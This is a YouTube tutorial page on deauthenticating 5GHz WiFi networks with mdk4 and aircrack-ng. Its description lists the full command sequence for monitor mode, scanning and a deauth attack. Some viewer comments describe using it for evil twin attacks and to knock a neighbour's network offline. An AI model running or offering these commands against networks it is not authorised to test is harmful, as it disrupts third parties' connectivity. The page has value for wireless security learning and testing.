Deauth 5GHz WiFi using mdk4 & aircrack-ng

69,830
0
Published 2021-06-27
Written tutorial: blog.spacehuhn.com/5ghz-deauther/
See all the links 👇

MDK4: github.com/aircrack-ng/mdk4
Nexmon: github.com/seemoo-lab/nexmon
Nexmon raspi tutorial: pimylifeup.com/raspberry-pi-nexmon/
RTL8812AU Driver: github.com/aircrack-ng/rtl8812au

Go shopping (affiliate links): ###
* RTL8812AU cards:
s.click.aliexpress.com/e/_9iKln5
amzn.to/3u2xWRU
* ALFA WiFi adapter I recommend (AWUS036AC):
amzn.to/3u62Ngo
* Alternative model with the same chip (AWUS036ACH):
amzn.to/3DG3mko
* Card I used (AWUS052NH) good luck finding it lol:
amzn.to/3DB7Usa

Commands I used in this video: ###

Install mdk4: sudo apt install mdk4
Check WiFi interfaces: sudo airmon-ng
Enable monitor mode: sudo airmon-ng start wlan1
Scan for WiFi devices: sudo airodump-ng wlan1mon
Scan on 5GHz: sudo airodump-ng wlan1mon --band a
Scan on Channel 44: sudo airodump-ng wlan1mon --band a --channel 44
Deauth network: sudo mdk4 wlan1mon d -E spacehuhn5ghz

Install rtl8812au driver:
Install dkms: sudo apt install dkms
Download git project: git clone github.com/aircrack-ng/rtl8812au.git
Open downloaded folder: cd rtl8812au
Install driver: sudo make dkms_install

Enable monitor mode on rtl8812au:
sudo ifconfig wlan1 down
sudo iwconfig wlan1 mode monitor
sudo ifconfig wlan1 up

Scan for WiFi devices: sudo airodump-ng wlan1

Chapters ###
00:00 Intro
00:11 2.4GHz vs 5GHz
00:42 Hardware
02:18 Installing Raspberrypi OS
03:27 Starting Raspberrypi
04:12 Installing mdk4
05:17 Tips for getting the correct WiFi adapter
07:36 RTL8812AU Tutorial
10:00 Scan for WiFi devices
11:52 Deauth a 5GHz network
13:48 Outro

📡 ESP8266 Deauther: github.com/SpacehuhnTech/esp8266_deauther
🌍 Website: spacehuhn.com/
📝 Blog: blog.spacehuhn.com/
❤️ Donations: ko-fi.com/spacehuhn
🐙 Github: github.com/SpacehuhnTech

All Comments (21)
  • @spacehuhn
    Update: I made a mistake. The card I am using is the AWUS036AC (without the M). They look exactly the same but the AWUS036ACM is using a different chipset mt7612u. You can thank ALFA for this confusion.
  • @dakata2416
    👀 The thing I never asked for but the thing I needed!
  • @xtobyplayz5946
    Awesome video! This was really interesting to watch 😀
  • Sehr geiles Tutorial. Toll aufgebaut und toll erklärt... Weckt direkt das innere Kind und weckt Lust das ganze nachzubauen.
  • @CaliNux.
    just discovered your channel. New sub! Really well done on your explanations and demoing. Thank you
  • @andretarvok7122
    Thanks for making this video man! I think the reason why people keep asking for 5g deauthers is because when you launch an evil twin and deauth every device from a router, most modern routers support both 2.4 and 5g and all the devices when kicked from the 2.4 band will just switch to 5g and the evil twin attack will fail. That's why you need a 5g deauth tool to kick both the 5g band and then a regular 2.4g deauth to complete the attack. I tried it on my new router and yes, without kicking both bands all my wifi connected devices with the exception of some old IoT stuff will just swith to 5g automatically. So this video is a huge help thank you! Looking forward for more tools! I actually recently bought your wifi rubber ducky and have been having weeks of fun making scripts for it. Great stuff.
  • @keshav2136
    Love your videos! They are an inspiration to watch
  • @LouiesLog
    Thank you for the tutorial Huhn! Working great with the RTL8812BU dongle
  • @woolfy02
    Thanks for the tutorial. Been wondering what project I could use my Raspberry pi 4 for.
  • @HeroRickyGames
    It's super interesting to see how it works, with a small terminal we can end up with Wi-Fi for some reasons, such as: loud sound. Helps!
  • @loveFactor397
    thank you for sharing your knowledge. I finally managed to stop neighbor's annoying music
  • @JBS_IT
    Just tried this out! It worked wonderfully! I managed to find a wifi adapter that met the requirements and was under 30$
  • @spacehuhn
    Should I make a video about nexmon?